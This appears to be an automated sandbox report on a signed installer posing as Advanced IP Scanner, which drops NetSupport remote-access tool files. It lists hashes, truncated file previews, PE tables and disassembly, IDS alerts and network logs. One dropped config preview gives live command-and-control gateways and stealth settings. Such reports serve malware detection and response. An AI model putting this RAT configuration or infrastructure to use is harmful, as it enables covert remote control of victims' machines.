                                                                                                                      SHA1:616AB761A1429E982062009B5C319F796A60BA1B
                                                                                                                      SHA-256:8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
                                                                                                                      SHA-512:C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
                                                                                                                      Malicious:false
                                                                                                                      Preview:0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):773968
                                                                                                                      Entropy (8bit):6.901559811406837
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:Windows setup INFormation
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):328
                                                                                                                      Entropy (8bit):4.93007757242403
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                      Malicious:false
                                                                                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):46
                                                                                                                      Entropy (8bit):4.532048032699691
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                      MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                      SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                      SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                      SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                      Malicious:false
                                                                                                                      Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33144
                                                                                                                      Entropy (8bit):6.737780491933496
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                      MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                      SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                      SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                      SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll, Author: Joe Security
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):72584
                                                                                                                      Entropy (8bit):6.671736046146569
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
                                                                                                                      MD5:2A2FC166269EFE48D61CB1AB92215DC2
                                                                                                                      SHA1:A5679174D941919BAF764F94640994C01D695625
                                                                                                                      SHA-256:73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
                                                                                                                      SHA-512:13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
                                                                                                                      Malicious:true
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L......^.....................J.......!............@.......................... ............@....................................<.......T................K..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2275903
                                                                                                                      Entropy (8bit):7.997003172118591
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
                                                                                                                      MD5:C56A7DCC8C1658FA154501AC0819BA7E
                                                                                                                      SHA1:DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
                                                                                                                      SHA-256:D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
                                                                                                                      SHA-512:AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
                                                                                                                      Malicious:false
                                                                                                                      Preview:PK.........0.6........H..... .nskbfltr.infUT...t..F...gt..Fux.............U....@......A<n..<IO+.(Eh...E.NF...dF.o..Z...B......p...3RlRBU....W..$....4l.. .!...QY. ^..m.%......SL......9.w.R.tv*....%.}..j..)...........0..F......V1.B6..y.WU...$..M....B1;~...&.)~...I....?.g..*_..R..PK.........H...PK...........W.............. .NSM.LICUT...l}.dl}.dl}.dux.............-..NB1...........]..(7..C...%,.n.....3....6_Sm.......w^..'...=......e.x.f+$dW. .I.=.{y#.|.....C.....tL.q.....hL>Q...D.j..8..W+ ..5\.....v.|^...../7...X.V...b...9...X@A.....f.:....Fx.@..7.......U.~.PK....k%........PK........S..<.............. .nsm_vpro.iniUT...n:.K...gn:.Kux..............v.........../JLO.w.KL.IM.5..rIM*M..I-K..qy..PK..I...-.......PK........bo.H........x..... .pcicapi.dllUT...x. W...gx. Wux...............\SG.8|.a@ (.D..E1...$,B.[.@.\A.`@..D..*1F.K..P...m.u_*.hk....Z..j...TQ.|..MX.>.............3s.....7....bQ..d.Q.......5@r.....}........2.........~ZJnn........\~...?'/].....k.q....{.Us.
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.992825732698486
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      File name:Advanced_IP_Scanner_2.5.4594.12.exe
                                                                                                                      File size:21'426'168 bytes
                                                                                                                      MD5:446c29d515104b6752c1e9da981d4e5e
                                                                                                                      SHA1:d52760df6b22805a4470a6b2e72654ce36577f30
                                                                                                                      SHA256:7b13496fb45b51e821771d63bbd1d503f07710f676481ff34962b051283d8033
                                                                                                                      SHA512:c1ad4560b055f630fae3487f0914e8b486d985edc4cf987649e190e1f36fc2ca47044ba94822add92245886a8048890fdda8263651d58a34d6ca0e85a3a73804
                                                                                                                      SSDEEP:393216:fTjU2t/X9E3JMUNccjPql0NbgVunl22V5v+w4lWKjEGZuv5:bjU2p9EZvNdjP6Kbaunldv+w4As7Zux
                                                                                                                      TLSH:71273363B687A43EF09E0B3B1672B25444FBAA116823AE1785F494BCCF250501E7F75B
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                      Icon Hash:af4f59b4f071970c
                                                                                                                      Entrypoint:0x4a83bc
                                                                                                                      Entrypoint Section:.itext
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:6
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:6
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:6
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                                                                                      Signature Valid:true
                                                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                      Error Number:0
                                                                                                                      Not Before, Not After
                                                                                                                      • 26/09/2024 07:47:26 27/09/2025 07:47:26
                                                                                                                      Subject Chain
                                                                                                                      • E=makedasalzbergneu79@gmail.com, CN=OMICARE JOINT STOCK COMPANY, O=OMICARE JOINT STOCK COMPANY, L=Ha Noi, S=Ha Noi, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Noi, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0108523661, OID.2.5.4.15=Private Organization
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:92142F58BB541C3BD5CD828C76AE0FC4
                                                                                                                      Thumbprint SHA-1:56FC98490B4845072947536B9E0AC121A37744E6
                                                                                                                      Thumbprint SHA-256:CF7A5967658B1BDB4A50A13D22EF734C707876B01D8D4B1F94FA493C5D4F3F57
                                                                                                                      Serial:7F07AA1BB8A3B0183893B1AA
                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      add esp, FFFFFFA4h
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      xor eax, eax
                                                                                                                      mov dword ptr [ebp-3Ch], eax
                                                                                                                      mov dword ptr [ebp-40h], eax
                                                                                                                      mov dword ptr [ebp-5Ch], eax
                                                                                                                      mov dword ptr [ebp-30h], eax
                                                                                                                      mov dword ptr [ebp-38h], eax
                                                                                                                      mov dword ptr [ebp-34h], eax
                                                                                                                      mov dword ptr [ebp-2Ch], eax
                                                                                                                      mov dword ptr [ebp-28h], eax
                                                                                                                      mov dword ptr [ebp-14h], eax
                                                                                                                      mov eax, 004A2EBCh
                                                                                                                      call 00007F33391BCEA5h
                                                                                                                      xor eax, eax
                                                                                                                      push ebp
                                                                                                                      push 004A8AC1h
                                                                                                                      push dword ptr fs:[eax]
                                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                                      xor edx, edx
                                                                                                                      push ebp
                                                                                                                      push 004A8A7Bh
                                                                                                                      push dword ptr fs:[edx]
                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                      mov eax, dword ptr [004B0634h]
                                                                                                                      call 00007F333924E82Bh
                                                                                                                      call 00007F333924E37Eh
                                                                                                                      lea edx, dword ptr [ebp-14h]
                                                                                                                      xor eax, eax
                                                                                                                      call 00007F3339249058h
                                                                                                                      mov edx, dword ptr [ebp-14h]
                                                                                                                      mov eax, 004B41F4h
                                                                                                                      call 00007F33391B6F53h
                                                                                                                      push 00000002h
                                                                                                                      push 00000000h
                                                                                                                      push 00000001h
                                                                                                                      mov ecx, dword ptr [004B41F4h]
                                                                                                                      mov dl, 01h
                                                                                                                      mov eax, dword ptr [0049CD14h]
                                                                                                                      call 00007F333924A383h
                                                                                                                      mov dword ptr [004B41F8h], eax
                                                                                                                      xor edx, edx
                                                                                                                      push ebp
                                                                                                                      push 004A8A27h
                                                                                                                      push dword ptr fs:[edx]
                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                      call 00007F333924E8B3h
                                                                                                                      mov dword ptr [004B4200h], eax
                                                                                                                      mov eax, dword ptr [004B4200h]
                                                                                                                      cmp dword ptr [eax+0Ch], 01h
                                                                                                                      jne 00007F333925559Ah
                                                                                                                      mov eax, dword ptr [004B4200h]
                                                                                                                      mov edx, 00000028h
                                                                                                                      call 00007F333924AC78h
                                                                                                                      mov edx, dword ptr [004B4200h]
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x992c.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x146c6b80x2940
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xcb0000x992c0x9a0089075e5f11da974cacd24bc703f451d6False0.34600750811688313data5.199005877288098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0xcb5b80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5472972972972973
                                                                                                                      RT_ICON0xcb6e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.34104046242774566
                                                                                                                      RT_ICON0xcbc480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.396505376344086
                                                                                                                      RT_ICON0xcbf300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5401624548736462
                                                                                                                      RT_ICON0xcc7d80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.2475609756097561
                                                                                                                      RT_ICON0xcce400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.42510660980810233
                                                                                                                      RT_ICON0xcdce80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5310283687943262
                                                                                                                      RT_ICON0xce1500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5316604127579737
                                                                                                                      RT_ICON0xcf1f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3271784232365145
                                                                                                                      RT_STRING0xd17a00x3f8data0.3198818897637795
                                                                                                                      RT_STRING0xd1b980x2dcdata0.36475409836065575
                                                                                                                      RT_STRING0xd1e740x430data0.40578358208955223
                                                                                                                      RT_STRING0xd22a40x44cdata0.38636363636363635
                                                                                                                      RT_STRING0xd26f00x2d4data0.39226519337016574
                                                                                                                      RT_STRING0xd29c40xb8data0.6467391304347826
                                                                                                                      RT_STRING0xd2a7c0x9cdata0.6410256410256411
                                                                                                                      RT_STRING0xd2b180x374data0.4230769230769231
                                                                                                                      RT_STRING0xd2e8c0x398data0.3358695652173913
                                                                                                                      RT_STRING0xd32240x368data0.3795871559633027
                                                                                                                      RT_STRING0xd358c0x2a4data0.4275147928994083
                                                                                                                      RT_RCDATA0xd38300x10data1.5
                                                                                                                      RT_RCDATA0xd38400x310data0.6173469387755102
                                                                                                                      RT_RCDATA0xd3b500x2cdata1.2045454545454546
                                                                                                                      RT_GROUP_ICON0xd3b7c0x84dataEnglishUnited States0.6666666666666666
                                                                                                                      RT_VERSION0xd3c000x584dataEnglishUnited States0.29036827195467424
                                                                                                                      RT_MANIFEST0xd41840x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                                                                                      DLLImport
                                                                                                                      kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                      comctl32.dllInitCommonControls
                                                                                                                      user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                      oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                      advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                                                                                      NameOrdinalAddress
                                                                                                                      __dbk_fcall_wrapper20x40fc10
                                                                                                                      dbkFCallWrapperAddr10x4b063c
                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States
                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-10-31T19:00:43.628569+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.449739151.236.16.15443TCP
                                                                                                                      2024-10-31T19:00:43.628569+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.449740199.188.200.195443TCP
                                                                                                                      2024-10-31T19:00:58.789554+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449733TCP
                                                                                                                      2024-10-31T19:01:37.187096+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449758TCP
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Oct 31, 2024 19:01:13.448246956 CET49739443192.168.2.4151.236.16.15
                                                                                                                      Oct 31, 2024 19:01:13.448297024 CET44349739151.236.16.15192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.448368073 CET49739443192.168.2.4151.236.16.15
                                                                                                                      Oct 31, 2024 19:01:13.587723970 CET49739443192.168.2.4151.236.16.15
                                                                                                                      Oct 31, 2024 19:01:13.587745905 CET44349739151.236.16.15192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.587790012 CET44349739151.236.16.15192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.612992048 CET49740443192.168.2.4199.188.200.195
                                                                                                                      Oct 31, 2024 19:01:13.613037109 CET44349740199.188.200.195192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.613097906 CET49740443192.168.2.4199.188.200.195
                                                                                                                      Oct 31, 2024 19:01:13.662723064 CET4974180192.168.2.4104.26.1.231
                                                                                                                      Oct 31, 2024 19:01:13.667761087 CET8049741104.26.1.231192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.667865992 CET4974180192.168.2.4104.26.1.231
                                                                                                                      Oct 31, 2024 19:01:13.668118000 CET4974180192.168.2.4104.26.1.231
                                                                                                                      Oct 31, 2024 19:01:13.674303055 CET8049741104.26.1.231192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.687496901 CET49740443192.168.2.4199.188.200.195
                                                                                                                      Oct 31, 2024 19:01:13.687517881 CET44349740199.188.200.195192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.687556028 CET44349740199.188.200.195192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:14.636095047 CET8049741104.26.1.231192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:14.636178970 CET4974180192.168.2.4104.26.1.231
                                                                                                                      Oct 31, 2024 19:03:03.614347935 CET4974180192.168.2.4104.26.1.231
                                                                                                                      Oct 31, 2024 19:03:03.619589090 CET8049741104.26.1.231192.168.2.4
                                                                                                                      Oct 31, 2024 19:03:03.622450113 CET4974180192.168.2.4104.26.1.231
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Oct 31, 2024 19:01:13.418778896 CET6186953192.168.2.41.1.1.1
                                                                                                                      Oct 31, 2024 19:01:13.444267988 CET53618691.1.1.1192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.588618994 CET5401253192.168.2.41.1.1.1
                                                                                                                      Oct 31, 2024 19:01:13.612397909 CET53540121.1.1.1192.168.2.4
                                                                                                                      Oct 31, 2024 19:01:13.642297029 CET6105353192.168.2.41.1.1.1
                                                                                                                      Oct 31, 2024 19:01:13.659729004 CET53610531.1.1.1192.168.2.4
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Oct 31, 2024 19:01:13.418778896 CET192.168.2.41.1.1.10x6974Standard query (0)payiki.comA (IP address)IN (0x0001)false
                                                                                                                      Oct 31, 2024 19:01:13.588618994 CET192.168.2.41.1.1.10x3414Standard query (0)anyhowdo.comA (IP address)IN (0x0001)false
